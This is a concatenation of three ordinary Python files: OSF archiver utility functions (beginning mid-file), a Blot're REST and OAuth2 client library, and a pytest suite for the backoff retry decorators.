results=results,
can_change_preferences=False,
)
def handle_archive_fail(reason, src, dst, user, result):
url = settings.INTERNAL_DOMAIN + src._id
if reason == ARCHIVER_NETWORK_ERROR:
send_archiver_copy_error_mails(src, user, result, url)
elif reason == ARCHIVER_SIZE_EXCEEDED:
send_archiver_size_exceeded_mails(src, user, result, url)
elif reason == ARCHIVER_FILE_NOT_FOUND:
send_archiver_file_not_found_mails(src, user, result, url)
elif reason == ARCHIVER_FORCED_FAILURE: # Forced failure using scripts.force_fail_registration
pass
else: # reason == ARCHIVER_UNCAUGHT_ERROR
send_archiver_uncaught_error_mails(src, user, result, url)
dst.root.sanction.forcibly_reject()
dst.root.sanction.save()
dst.root.delete_registration_tree(save=True)
def archive_provider_for(node, user):
"""A generic function to get the archive provider for some node, user pair.
:param node: target node
:param user: target user (currently unused, but left in for future-proofing
the code for use with archive providers other than OSF Storage)
"""
return node.get_addon(settings.ARCHIVE_PROVIDER)
def has_archive_provider(node, user):
"""A generic function for checking whether or not some node, user pair has
an attached provider for archiving
:param node: target node
:param user: target user (currently unused, but left in for future-proofing
the code for use with archive providers other than OSF Storage)
"""
return node.has_addon(settings.ARCHIVE_PROVIDER)
def link_archive_provider(node, user):
"""A generic function for linking some node, user pair with the configured
archive provider
:param node: target node
:param user: target user (currently unused, but left in for future-proofing
the code for use with archive providers other than OSF Storage)
"""
addon = node.get_or_add_addon(settings.ARCHIVE_PROVIDER, auth=Auth(user), log=False)
if hasattr(addon, 'on_add'):
addon.on_add()
node.save()
def aggregate_file_tree_metadata(addon_short_name, fileobj_metadata, user):
"""Recursively traverse the addon's file tree and collect metadata in AggregateStatResult
    :param addon_short_name: short name of the addon whose file tree is being examined
    :param fileobj_metadata: file or folder metadata of current point of reference
    in file tree
    :param user: archive initiator
:return: top-most recursive call returns AggregateStatResult containing addon file tree metadata
"""
disk_usage = fileobj_metadata.get('size')
if fileobj_metadata['kind'] == 'file':
result = StatResult(
target_name=fileobj_metadata['name'],
target_id=fileobj_metadata['path'].lstrip('/'),
disk_usage=disk_usage or 0,
)
return result
else:
return AggregateStatResult(
target_id=fileobj_metadata['path'].lstrip('/'),
target_name=fileobj_metadata['name'],
targets=[aggregate_file_tree_metadata(addon_short_name, child, user) for child in fileobj_metadata.get('children', [])],
)
def before_archive(node, user):
from osf.models import ArchiveJob
link_archive_provider(node, user)
job = ArchiveJob.objects.create(
src_node=node.registered_from,
dst_node=node,
initiator=user
)
job.set_targets()
def _do_get_file_map(file_tree):
"""Reduces a tree of folders and files into a list of (<sha256>, <file_metadata>) pairs
"""
file_map = []
stack = [file_tree]
while len(stack):
tree_node = stack.pop(0)
if tree_node['kind'] == 'file':
file_map.append((tree_node['extra']['hashes']['sha256'], tree_node))
else:
stack = stack + tree_node['children']
return file_map
def _memoize_get_file_map(func):
cache = {}
@functools.wraps(func)
def wrapper(node):
from osf.models import OSFUser
if node._id not in cache:
osf_storage = node.get_addon('osfstorage')
file_tree = osf_storage._get_file_tree(user=OSFUser.load(list(node.admin_contributor_or_group_member_ids)[0]))
cache[node._id] = _do_get_file_map(file_tree)
return func(node, cache[node._id])
return wrapper
@_memoize_get_file_map
def get_file_map(node, file_map):
"""
    note:: file_map is injected implicitly by the decorator; this method is called like:
get_file_map(node)
"""
for (key, value) in file_map:
yield (key, value, node._id)
for child in node.nodes_primary:
for key, value, node_id in get_file_map(child):
yield (key, value, node_id)
def find_registration_file(value, node):
"""
some annotations:
- `value` is the `extra` from a file upload in `registered_meta`
(see `Uploader.addFile` in website/static/js/registrationEditorExtensions.js)
- `node` is a Registration instance
- returns a `(file_info, node_id)` or `(None, None)` tuple, where `file_info` is from waterbutler's api
(see `addons.base.models.BaseStorageAddon._get_fileobj_child_metadata` and `waterbutler.core.metadata.BaseMetadata`)
"""
from osf.models import AbstractNode
orig_sha256 = value['sha256']
orig_name = unescape_entities(
value['selectedFileName'],
safe={
            '<': '&lt;',
            '>': '&gt;'
}
)
orig_node = value['nodeId']
file_map = get_file_map(node)
for sha256, file_info, node_id in file_map:
registered_from_id = AbstractNode.load(node_id).registered_from._id
if sha256 == orig_sha256 and registered_from_id == orig_node and orig_name == file_info['name']:
return file_info, node_id
return None, None
def find_registration_files(values, node):
"""
some annotations:
- `values` is from `registered_meta`, e.g. `{ comments: [], value: '', extra: [] }`
- `node` is a Registration model instance
- returns a list of `(file_info, node_id, index)` or `(None, None, index)` tuples,
where `file_info` is from `find_registration_file` above
"""
ret = []
for i in range(len(values.get('extra', []))):
ret.append(find_registration_file(values['extra'][i], node) + (i,))
return ret
def get_title_for_question(schema, path):
path = path.split('.')
root = path.pop(0)
item = None
for page in schema['pages']:
questions = {
q['qid']: q
for q in page['questions']
}
if root in questions:
item = questions[root]
title = item.get('title')
while len(path):
item = item.get(path.pop(0), {})
title = item.get('title', title)
return title
def find_selected_files(schema, metadata):
"""
some annotations:
- `schema` is a RegistrationSchema instance
- `metadata` is from `registered_meta` (for the given schema)
- returns a dict that maps from each `osf-upload` question id (`.`-delimited path) to its chunk of metadata,
e.g. `{ 'q1.uploader': { comments: [], extra: [...], value: 'foo.pdf' } }`
"""
targets = []
paths = [('', p) for p in schema.schema['pages']]
while len(paths):
prefix, path = paths.pop(0)
if path.get('questions'):
paths = paths + [('', q) for q in path['questions']]
elif path.get('type'):
qid = path.get('qid', path.get('id'))
if path['type'] == 'object':
paths = paths + [('{}.{}.value'.format(prefix, qid), p) for p in path['properties']]
elif path['type'] == 'osf-upload':
targets.append('{}.{}'.format(prefix, qid).lstrip('.'))
selected = {}
for t in targets:
parts = t.split('.')
value = metadata.get(parts.pop(0))
while value and len(parts):
value = value.get(parts.pop(0))
if value:
selected[t] = value
return selected
VIEW_FILE_URL_TEMPLATE = '/project/{node_id}/files/osfstorage/{file_id}/'
def deep_get(obj, path):
parts = path.split('.')
item = obj
key = None
while len(parts):
key = parts.pop(0)
item[key] = item.get(key, {})
item = item[key]
return item
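# For illustration: deep_get({'q1': {'value': {'uploader': {}}}}, 'q1.value.uploader')
# walks the nested dicts along the '.'-delimited path (creating empty dicts for any
# missing keys on the way) and returns the innermost one.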
def migrate_file_metadata(dst, schema):
metadata = dst.registered_meta[schema._id]
missing_files = []
selected_files = find_selected_files(schema, metadata)
for path, selected in selected_files.items():
target = deep_get(metadata, path)
for archived_file_info, node_id, index in find_registration_files(selected, dst):
if not archived_file_info:
missing_files.append({
'file_name': selected['extra'][index]['selectedFileName'],
'question_title': get_title_for_question(schema.schema, path)
})
continue
archived_file_id = archived_file_info['path'].lstrip('/')
target['extra'][index]['viewUrl'] = VIEW_FILE_URL_TEMPLATE.format(node_id=node_id, file_id=archived_file_id)
if missing_files:
from website.archiver.tasks import ArchivedFileNotFound
raise ArchivedFileNotFound(
registration=dst,
missing_files=missing_files
)
dst.registered_meta[schema._id] = metadata
dst.registration_responses = dst.flatten_registration_metadata()
dst.save()
|
|
import json
import os
import re
import requests
try:
    from urllib import urlencode, quote
    from urlparse import urlunparse
except ImportError:
    from urllib.parse import urlencode, quote
    from urllib.parse import urlunparse
_JSON_HEADERS = {
'accepts': 'application/json',
'content-type': 'application/json'
}
ROOT = '/v0/'
API_ROOT = ROOT + 'api/'
OAUTH2_ROOT = ROOT + 'oauth2/'
DEFAULT_CONFIG = {
'protocol': 'https',
'host': 'blot.re',
}
def _extend(dict1, dict2):
extended = dict1.copy()
extended.update(dict2)
return extended
class TokenEndpointError(Exception):
"""
Error communicating with the token endpoint.
"""
def __init__(self, error, error_description):
self.error = error
self.error_description = error_description
super(TokenEndpointError, self).__init__(
"[%s] %s" % (self.error, self.error_description))
def _token_error_from_data(data):
return TokenEndpointError(
data.get('error', ''),
data.get('error_description', ''))
class RestError(Exception):
"""
Error response from one of the REST APIS.
"""
def __init__(self, status_code, error_description, details):
self.status_code = status_code
self.error_description = error_description
self.details = details
super(RestError, self).__init__(
"[%s] %s" % (self.status_code, self.error_description))
def _is_error_response(body):
return body.get('type', '') == 'Error' or 'error' in body
def _rest_error_from_response(response):
body = response.json()
return RestError(
response.status_code,
body['error'],
body.get('details', None))
def _format_url(config, relPath, query={}):
return urlunparse((
config.get('protocol'),
config.get('host'),
relPath,
'',
urlencode(query),
''))
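# For example, with DEFAULT_CONFIG this yields URLs such as
#   _format_url(DEFAULT_CONFIG, API_ROOT + 'stream', {'query': 'weather'})
#   == 'https://blot.re/v0/api/stream?query=weather'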
class Blotre:
"""
Main Blot're flow object.
"""
def __init__(self, client, creds={}, config={}):
self.client = client
self.config = _extend(DEFAULT_CONFIG, config)
self.creds = creds
def set_creds(self, newCreds):
"""Manually update the current creds."""
self.creds = newCreds
self.on_creds_changed(newCreds)
return self
def on_creds_changed(self, newCreds):
"""
Overridable function called when the creds change
"""
pass
def normalize_uri(self, uri):
"""Convert a stream path into it's normalized form."""
return urllib.quote(
re.sub(r"\s", '+', uri.strip().lower()),
safe = '~@#$&()*!+=:),.?/\'')
def join_uri(self, *paths):
return '/'.join(self.normalize_uri(x) for x in paths)
def _get_websocket_protocol(self):
        return 'ws' if self.config.get('protocol') == 'http' else 'wss'
    def get_websocket_url(self):
        """
        Get the url for using the websocket APIs,
        used for both subscription and send/receive.
        """
        return self._get_websocket_protocol() + '://' + self.config.get('host') + '/v0/ws'
def _format_url(self, relPath, query={}):
return _format_url(self.config, relPath, query)
# Authorization
def get_authorization_url(self):
"""Get the authorization Url for the current client."""
return self._format_url(
OAUTH2_ROOT + 'authorize',
query = {
'response_type': 'code',
'client_id': self.client.get('client_id', ''),
'redirect_uri': self.client.get('redirect_uri', '')
})
def get_redeem_url(self):
"""
Get the Url where a user can redeem a onetime code
for a disposable client.
"""
return self._format_url(OAUTH2_ROOT + 'redeem')
def _access_token_endpoint(self, grantType, extraParams={}):
"""
Base exchange of data for an access_token.
"""
response = requests.post(
self._format_url(OAUTH2_ROOT + 'access_token'),
data = _extend({
'grant_type': grantType,
'client_id': self.client.get('client_id', ''),
'client_secret': self.client.get('client_secret', ''),
'redirect_uri': self.client.get('redirect_uri', '')
}, extraParams))
data = response.json()
if 'error' in data or 'error_description' in data:
raise _token_error_from_data(data)
else:
return self.set_creds(data)
def redeem_authorization_code(self, code):
"""
Exchange an authorization code for a new access token.
If successful, update client to use these credentials.
"""
return self._access_token_endpoint('authorization_code', {
'code': code
})
def exchange_refresh_token(self):
"""
Attempt to exchange a refresh token for a new access token.
If successful, update client to use these credentials.
"""
return self._access_token_endpoint('refresh_token', {
'refresh_token': self.creds['refresh_token']
})
def redeem_onetime_code(self, code):
"""
Attempt to exchange a onetime token for a new access token.
If successful, update client to use these credentials.
"""
return self._access_token_endpoint(
'https://oauth2grant.blot.re/onetime_code', {
'code': code if code else self.client['code']
})
def get_token_info(self):
"""
Get information about the current access token.
"""
response = requests.get(
self._format_url(OAUTH2_ROOT + 'token_info', {
'token': self.creds['access_token']
}))
data = response.json()
if response.status_code != 200:
raise _token_error_from_data(data)
else:
return data
# Requests
def _add_auth_headers(self, base):
"""Attach the acces_token to a request."""
if 'access_token' in self.creds:
return _extend(base, {
'authorization': 'Bearer ' + self.creds['access_token']
})
return base
def _is_expired_response(self, response):
"""
Check if the response failed because of an expired access token.
"""
if response.status_code != 401:
return False
challenge = response.headers.get('www-authenticate', '')
return 'error="invalid_token"' in challenge
def _make_request(self, type, path, args, noRetry=False):
"""
Make a request to Blot're.
        Attempts to retry the request if it fails due to an expired
        access token.
"""
response = getattr(requests, type)(path, headers = self._add_auth_headers(_JSON_HEADERS), **args)
if response.status_code == 200 or response.status_code == 201:
return response.json()
elif not noRetry and self._is_expired_response(response) \
and 'refresh_token' in self.creds:
try:
self.exchange_refresh_token()
except TokenEndpointError:
raise _rest_error_from_response(response)
return self._make_request(type, path, args, noRetry = True)
raise _rest_error_from_response(response)
def get(self, path, query={}):
"""GET request."""
return self._make_request('get',
self._format_url(API_ROOT + path, query=query), {})
def post(self, path, body):
"""POST request."""
return self._make_request('post',
self._format_url(API_ROOT + path), {
'json': body
})
def put(self, path, body):
"""PUT request."""
return self._make_request('put',
self._format_url(API_ROOT + path), {
'json': body
})
    def delete(self, path):
        """DELETE request."""
        return self._make_request('delete',
            self._format_url(API_ROOT + path), {})
# User Operations
def get_user(self, userId, options={}):
"""Get a user by id."""
return self.get('user/' + userId, options)
# Stream Operations
def get_streams(self, options={}):
"""Stream lookup."""
return self.get('stream', options)
def create_stream(self, body):
"""Create a new stream."""
return self.put('stream', body)
def get_stream(self, id, options={}):
"""Get a stream."""
return self.get('stream/' + id, options)
    def delete_stream(self, id):
        """Delete an existing stream."""
        return self.delete('stream/' + id)
    def get_stream_status(self, id, options={}):
        """Get the status of a stream."""
        return self.get('stream/' + id + '/status', options)
def set_stream_status(self, id, body):
"""Update the status of a stream."""
return self.post('stream/' + id + '/status', body)
def get_stream_children(self, id, options={}):
"""Get the children of a stream."""
return self.get('stream/' + id + '/children', options)
def get_child(self, streamId, childId, options={}):
"""Get the child of a stream."""
return self.get('stream/' + streamId + '/children/' + childId, options)
    def create_child(self, streamId, childId):
        """Add a new child to a stream."""
        # `put` requires a body; the child is identified by the URL itself.
        return self.put('stream/' + streamId + '/children/' + childId, {})
def delete_child(self, streamId, childId):
"""Remove a child from a stream."""
return self.delete('stream/' + streamId + '/children/' + childId)
    def get_tags(self, streamId):
        """Get the tags of a stream."""
        return self.get('stream/' + streamId + '/tags')
    def set_tags(self, streamId, tags):
        """Set the tags of a stream."""
        return self.post('stream/' + streamId + '/tags', tags)
    def get_tag(self, streamId, tag):
        """Get a tag on a stream."""
        return self.get('stream/' + streamId + '/tags/' + tag)
    def set_tag(self, streamId, tag):
        """Create a tag on a stream."""
        # `put` requires a body; the tag is identified by the URL itself.
        return self.put('stream/' + streamId + '/tags/' + tag, {})
    def delete_tag(self, streamId, tag):
        """Remove a tag on a stream."""
        return self.delete('stream/' + streamId + '/tags/' + tag)
# Basic Disposable Client
def create_disposable(clientInfo, config = {}):
"""
Create a new disposable client.
"""
response = requests.put(
_format_url(
_extend(DEFAULT_CONFIG, config),
OAUTH2_ROOT + 'disposable'),
json = clientInfo)
if response.status_code != 200:
return None
else:
body = response.json()
return Blotre({
'client_id': body['id'],
'client_secret': body['secret'],
'code': body['code']
}, config = config)
# Disposable App
class _BlotreDisposableApp(Blotre):
def __init__(self, file, client, **kwargs):
Blotre.__init__(self, client, **kwargs)
self.file = file
self._persist()
def on_creds_changed(self, newCreds):
self._persist()
def _persist(self):
"""Persist client data."""
with open(self.file, 'w') as f:
json.dump({
'client': self.client,
'creds': self.creds,
'config': self.config
}, f)
def _get_disposable_app_filename(clientInfo):
"""
Get name of file used to store creds.
"""
return clientInfo.get('file', clientInfo['name'] + '.client_data.json')
def _get_existing_disposable_app(file, clientInfo, conf):
"""
    Attempt to load an existing disposable client from file.
"""
if not os.path.isfile(file):
return None
else:
data = None
with open(file, 'r') as f:
data = json.load(f)
if not 'client' in data or not 'creds' in data:
return None
return _BlotreDisposableApp(file,
data['client'],
creds = data['creds'],
config = conf)
def _try_redeem_disposable_app(file, client):
"""
    Attempt to redeem a onetime code registered on the client.
"""
redeemedClient = client.redeem_onetime_code(None)
if redeemedClient is None:
return None
else:
return _BlotreDisposableApp(file,
redeemedClient.client,
creds = redeemedClient.creds,
config = redeemedClient.config)
def _create_new_disposable_app(file, clientInfo, config):
client = create_disposable(clientInfo, config = config)
if client is None:
return None
code = client.client['code']
userInput = raw_input("Please redeem disposable code: " + code + '\n')
return _try_redeem_disposable_app(file, client)
def _check_app_is_valid(client):
"""
Check to see if the app has valid creds.
"""
try:
if 'refresh_token' in client.creds:
client.exchange_refresh_token()
else:
            client.get_token_info()
return True
except TokenEndpointError as e:
return False
def create_disposable_app(clientInfo, config={}):
"""
Use an existing disposable app if data exists or create a new one
and persist the data.
"""
file = _get_disposable_app_filename(clientInfo)
existing = _get_existing_disposable_app(file, clientInfo, config)
if existing:
if _check_app_is_valid(existing):
return existing
else:
print("Existing client has expired, must recreate.")
return _create_new_disposable_app(file, clientInfo, config)
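# A minimal usage sketch, not part of the library code above. Only the 'name'
# key of clientInfo is relied upon by this module; any additional registration
# fields are passed through to Blot're unchanged. Error handling is omitted.
if __name__ == '__main__':
    example_client = create_disposable_app({'name': 'example-app'})
    if example_client is not None:
        # Once the onetime code has been redeemed, any of the REST helpers
        # defined on Blotre can be used.
        print(example_client.get_streams())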
|
|
# coding:utf-8
import datetime
import itertools
import logging
import random
import re
import sys
import threading
import unittest.mock
import pytest
import backoff
from tests.common import _save_target
def test_on_predicate(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
@backoff.on_predicate(backoff.expo)
def return_true(log, n):
val = (len(log) == n - 1)
log.append(val)
return val
log = []
ret = return_true(log, 3)
assert ret is True
assert 3 == len(log)
def test_on_predicate_max_tries(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
@backoff.on_predicate(backoff.expo, jitter=None, max_tries=3)
def return_true(log, n):
val = (len(log) == n)
log.append(val)
return val
log = []
ret = return_true(log, 10)
assert ret is False
assert 3 == len(log)
def test_on_predicate_max_time(monkeypatch):
nows = [
datetime.datetime(2018, 1, 1, 12, 0, 10, 5),
datetime.datetime(2018, 1, 1, 12, 0, 9, 0),
datetime.datetime(2018, 1, 1, 12, 0, 1, 0),
datetime.datetime(2018, 1, 1, 12, 0, 0, 0),
]
class Datetime:
@staticmethod
def now():
return nows.pop()
monkeypatch.setattr('time.sleep', lambda x: None)
monkeypatch.setattr('datetime.datetime', Datetime)
def giveup(details):
assert details['tries'] == 3
assert details['elapsed'] == 10.000005
@backoff.on_predicate(backoff.expo, jitter=None, max_time=10,
on_giveup=giveup)
def return_true(log, n):
val = (len(log) == n)
log.append(val)
return val
log = []
ret = return_true(log, 10)
assert ret is False
assert len(log) == 3
def test_on_exception(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
@backoff.on_exception(backoff.expo, KeyError)
def keyerror_then_true(log, n):
if len(log) == n:
return True
e = KeyError()
log.append(e)
raise e
log = []
assert keyerror_then_true(log, 3) is True
assert 3 == len(log)
def test_on_exception_tuple(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
@backoff.on_exception(backoff.expo, (KeyError, ValueError))
def keyerror_valueerror_then_true(log):
if len(log) == 2:
return True
if len(log) == 0:
e = KeyError()
if len(log) == 1:
e = ValueError()
log.append(e)
raise e
log = []
assert keyerror_valueerror_then_true(log) is True
assert 2 == len(log)
assert isinstance(log[0], KeyError)
assert isinstance(log[1], ValueError)
def test_on_exception_max_tries(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
@backoff.on_exception(backoff.expo, KeyError, jitter=None, max_tries=3)
def keyerror_then_true(log, n, foo=None):
if len(log) == n:
return True
e = KeyError()
log.append(e)
raise e
log = []
with pytest.raises(KeyError):
keyerror_then_true(log, 10, foo="bar")
assert 3 == len(log)
def test_on_exception_constant_iterable(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
backoffs = []
giveups = []
successes = []
@backoff.on_exception(
backoff.constant,
KeyError,
interval=(1, 2, 3),
on_backoff=backoffs.append,
on_giveup=giveups.append,
on_success=successes.append,
)
def endless_exceptions():
raise KeyError('foo')
with pytest.raises(KeyError):
endless_exceptions()
assert len(backoffs) == 3
assert len(giveups) == 1
assert len(successes) == 0
def test_on_exception_success_random_jitter(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
backoffs, giveups, successes = [], [], []
@backoff.on_exception(backoff.expo,
Exception,
on_success=successes.append,
on_backoff=backoffs.append,
on_giveup=giveups.append,
jitter=backoff.random_jitter,
factor=0.5)
@_save_target
def succeeder(*args, **kwargs):
# succeed after we've backed off twice
if len(backoffs) < 2:
raise ValueError("catch me")
succeeder(1, 2, 3, foo=1, bar=2)
# we try 3 times, backing off twice before succeeding
assert len(successes) == 1
assert len(backoffs) == 2
assert len(giveups) == 0
for i in range(2):
details = backoffs[i]
assert details['wait'] >= 0.5 * 2 ** i
def test_on_exception_success_full_jitter(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
backoffs, giveups, successes = [], [], []
@backoff.on_exception(backoff.expo,
Exception,
on_success=successes.append,
on_backoff=backoffs.append,
on_giveup=giveups.append,
jitter=backoff.full_jitter,
factor=0.5)
@_save_target
def succeeder(*args, **kwargs):
# succeed after we've backed off twice
if len(backoffs) < 2:
raise ValueError("catch me")
succeeder(1, 2, 3, foo=1, bar=2)
# we try 3 times, backing off twice before succeeding
assert len(successes) == 1
assert len(backoffs) == 2
assert len(giveups) == 0
for i in range(2):
details = backoffs[i]
assert details['wait'] <= 0.5 * 2 ** i
def test_on_exception_success():
backoffs, giveups, successes = [], [], []
@backoff.on_exception(backoff.constant,
Exception,
on_success=successes.append,
on_backoff=backoffs.append,
on_giveup=giveups.append,
jitter=None,
interval=0)
@_save_target
def succeeder(*args, **kwargs):
# succeed after we've backed off twice
if len(backoffs) < 2:
raise ValueError("catch me")
succeeder(1, 2, 3, foo=1, bar=2)
# we try 3 times, backing off twice before succeeding
assert len(successes) == 1
assert len(backoffs) == 2
assert len(giveups) == 0
for i in range(2):
details = backoffs[i]
elapsed = details.pop('elapsed')
assert isinstance(elapsed, float)
assert details == {'args': (1, 2, 3),
'kwargs': {'foo': 1, 'bar': 2},
'target': succeeder._target,
'tries': i + 1,
'wait': 0}
details = successes[0]
elapsed = details.pop('elapsed')
assert isinstance(elapsed, float)
assert details == {'args': (1, 2, 3),
'kwargs': {'foo': 1, 'bar': 2},
'target': succeeder._target,
'tries': 3}
@pytest.mark.parametrize('raise_on_giveup', [True, False])
def test_on_exception_giveup(raise_on_giveup):
backoffs, giveups, successes = [], [], []
@backoff.on_exception(backoff.constant,
ValueError,
on_success=successes.append,
on_backoff=backoffs.append,
on_giveup=giveups.append,
max_tries=3,
jitter=None,
raise_on_giveup=raise_on_giveup,
interval=0)
@_save_target
def exceptor(*args, **kwargs):
raise ValueError("catch me")
if raise_on_giveup:
with pytest.raises(ValueError):
exceptor(1, 2, 3, foo=1, bar=2)
else:
exceptor(1, 2, 3, foo=1, bar=2)
# we try 3 times, backing off twice and giving up once
assert len(successes) == 0
assert len(backoffs) == 2
assert len(giveups) == 1
details = giveups[0]
elapsed = details.pop('elapsed')
assert isinstance(elapsed, float)
assert details == {'args': (1, 2, 3),
'kwargs': {'foo': 1, 'bar': 2},
'target': exceptor._target,
'tries': 3}
def test_on_exception_giveup_predicate(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
def on_baz(e):
return str(e) == "baz"
vals = ["baz", "bar", "foo"]
@backoff.on_exception(backoff.constant,
ValueError,
giveup=on_baz)
def foo_bar_baz():
raise ValueError(vals.pop())
with pytest.raises(ValueError):
foo_bar_baz()
assert not vals
def test_on_predicate_success():
backoffs, giveups, successes = [], [], []
@backoff.on_predicate(backoff.constant,
on_success=successes.append,
on_backoff=backoffs.append,
on_giveup=giveups.append,
jitter=None,
interval=0)
@_save_target
def success(*args, **kwargs):
# succeed after we've backed off twice
return len(backoffs) == 2
success(1, 2, 3, foo=1, bar=2)
# we try 3 times, backing off twice before succeeding
assert len(successes) == 1
assert len(backoffs) == 2
assert len(giveups) == 0
for i in range(2):
details = backoffs[i]
elapsed = details.pop('elapsed')
assert isinstance(elapsed, float)
assert details == {'args': (1, 2, 3),
'kwargs': {'foo': 1, 'bar': 2},
'target': success._target,
'tries': i + 1,
'value': False,
'wait': 0}
details = successes[0]
elapsed = details.pop('elapsed')
assert isinstance(elapsed, float)
assert details == {'args': (1, 2, 3),
'kwargs': {'foo': 1, 'bar': 2},
'target': success._target,
'tries': 3,
'value': True}
def test_on_predicate_giveup():
backoffs, giveups, successes = [], [], []
@backoff.on_predicate(backoff.constant,
on_success=successes.append,
on_backoff=backoffs.append,
on_giveup=giveups.append,
max_tries=3,
jitter=None,
interval=0)
@_save_target
def emptiness(*args, **kwargs):
pass
emptiness(1, 2, 3, foo=1, bar=2)
# we try 3 times, backing off twice and giving up once
assert len(successes) == 0
assert len(backoffs) == 2
assert len(giveups) == 1
details = giveups[0]
elapsed = details.pop('elapsed')
assert isinstance(elapsed, float)
assert details == {'args': (1, 2, 3),
'kwargs': {'foo': 1, 'bar': 2},
'target': emptiness._target,
'tries': 3,
'value': None}
def test_on_predicate_iterable_handlers():
class Logger:
def __init__(self):
self.backoffs = []
self.giveups = []
self.successes = []
loggers = [Logger() for _ in range(3)]
@backoff.on_predicate(backoff.constant,
on_backoff=(l.backoffs.append for l in loggers),
on_giveup=(l.giveups.append for l in loggers),
on_success=(l.successes.append for l in loggers),
max_tries=3,
jitter=None,
interval=0)
@_save_target
def emptiness(*args, **kwargs):
pass
emptiness(1, 2, 3, foo=1, bar=2)
for logger in loggers:
assert len(logger.successes) == 0
assert len(logger.backoffs) == 2
assert len(logger.giveups) == 1
details = dict(logger.giveups[0])
print(details)
elapsed = details.pop('elapsed')
assert isinstance(elapsed, float)
assert details == {'args': (1, 2, 3),
'kwargs': {'foo': 1, 'bar': 2},
'target': emptiness._target,
'tries': 3,
'value': None}
# To maintain backward compatibility,
# on_predicate should support 0-argument jitter function.
def test_on_exception_success_0_arg_jitter(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
monkeypatch.setattr('random.random', lambda: 0)
backoffs, giveups, successes = [], [], []
@backoff.on_exception(backoff.constant,
Exception,
on_success=successes.append,
on_backoff=backoffs.append,
on_giveup=giveups.append,
jitter=random.random,
interval=0)
@_save_target
def succeeder(*args, **kwargs):
# succeed after we've backed off twice
if len(backoffs) < 2:
raise ValueError("catch me")
with pytest.deprecated_call():
succeeder(1, 2, 3, foo=1, bar=2)
# we try 3 times, backing off twice before succeeding
assert len(successes) == 1
assert len(backoffs) == 2
assert len(giveups) == 0
for i in range(2):
details = backoffs[i]
elapsed = details.pop('elapsed')
assert isinstance(elapsed, float)
assert details == {'args': (1, 2, 3),
'kwargs': {'foo': 1, 'bar': 2},
'target': succeeder._target,
'tries': i + 1,
'wait': 0}
details = successes[0]
elapsed = details.pop('elapsed')
assert isinstance(elapsed, float)
assert details == {'args': (1, 2, 3),
'kwargs': {'foo': 1, 'bar': 2},
'target': succeeder._target,
'tries': 3}
# To maintain backward compatibility,
# on_predicate should support 0-argument jitter function.
def test_on_predicate_success_0_arg_jitter(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
monkeypatch.setattr('random.random', lambda: 0)
backoffs, giveups, successes = [], [], []
@backoff.on_predicate(backoff.constant,
on_success=successes.append,
on_backoff=backoffs.append,
on_giveup=giveups.append,
jitter=random.random,
interval=0)
@_save_target
def success(*args, **kwargs):
# succeed after we've backed off twice
return len(backoffs) == 2
with pytest.deprecated_call():
success(1, 2, 3, foo=1, bar=2)
# we try 3 times, backing off twice before succeeding
assert len(successes) == 1
assert len(backoffs) == 2
assert len(giveups) == 0
for i in range(2):
details = backoffs[i]
print(details)
elapsed = details.pop('elapsed')
assert isinstance(elapsed, float)
assert details == {'args': (1, 2, 3),
'kwargs': {'foo': 1, 'bar': 2},
'target': success._target,
'tries': i + 1,
'value': False,
'wait': 0}
details = successes[0]
elapsed = details.pop('elapsed')
assert isinstance(elapsed, float)
assert details == {'args': (1, 2, 3),
'kwargs': {'foo': 1, 'bar': 2},
'target': success._target,
'tries': 3,
'value': True}
def test_on_exception_callable_max_tries(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
def lookup_max_tries():
return 3
log = []
@backoff.on_exception(backoff.constant,
ValueError,
max_tries=lookup_max_tries)
def exceptor():
log.append(True)
raise ValueError()
with pytest.raises(ValueError):
exceptor()
assert len(log) == 3
def test_on_exception_callable_gen_kwargs():
def lookup_foo():
return "foo"
def wait_gen(foo=None, bar=None):
assert foo == "foo"
assert bar == "bar"
while True:
yield 0
@backoff.on_exception(wait_gen,
ValueError,
max_tries=2,
foo=lookup_foo,
bar="bar")
def exceptor():
raise ValueError("aah")
with pytest.raises(ValueError):
exceptor()
def test_on_predicate_in_thread(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
result = []
def check():
try:
@backoff.on_predicate(backoff.expo)
def return_true(log, n):
val = (len(log) == n - 1)
log.append(val)
return val
log = []
ret = return_true(log, 3)
assert ret is True
assert 3 == len(log)
except Exception as ex:
result.append(ex)
else:
result.append('success')
t = threading.Thread(target=check)
t.start()
t.join()
assert len(result) == 1
assert result[0] == 'success'
def test_on_predicate_constant_iterable(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
waits = [1, 2, 3, 6, 9]
backoffs = []
giveups = []
successes = []
@backoff.on_predicate(
backoff.constant,
interval=waits,
on_backoff=backoffs.append,
on_giveup=giveups.append,
on_success=successes.append,
jitter=None,
)
def falsey():
return False
assert not falsey()
assert len(backoffs) == len(waits)
for i, wait in enumerate(waits):
assert backoffs[i]['wait'] == wait
assert len(giveups) == 1
assert len(successes) == 0
def test_on_exception_in_thread(monkeypatch):
monkeypatch.setattr('time.sleep', lambda x: None)
result = []
def check():
try:
@backoff.on_exception(backoff.expo, KeyError)
def keyerror_then_true(log, n):
if len(log) == n:
return True
e = KeyError()
log.append(e)
raise e
log = []
assert keyerror_then_true(log, 3) is True
assert 3 == len(log)
except Exception as ex:
result.append(ex)
else:
result.append('success')
t = threading.Thread(target=check)
t.start()
t.join()
assert len(result) == 1
assert result[0] == 'success'
def test_on_exception_logger_default(monkeypatch, caplog):
monkeypatch.setattr('time.sleep', lambda x: None)
logger = logging.getLogger('backoff')
handler = logging.StreamHandler(sys.stdout)
logger.addHandler(handler)
@backoff.on_exception(backoff.expo, KeyError, max_tries=3)
def key_error():
raise KeyError()
with caplog.at_level(logging.INFO):
with pytest.raises(KeyError):
key_error()
assert len(caplog.records) == 3 # 2 backoffs and 1 giveup
for record in caplog.records:
assert record.name == 'backoff'
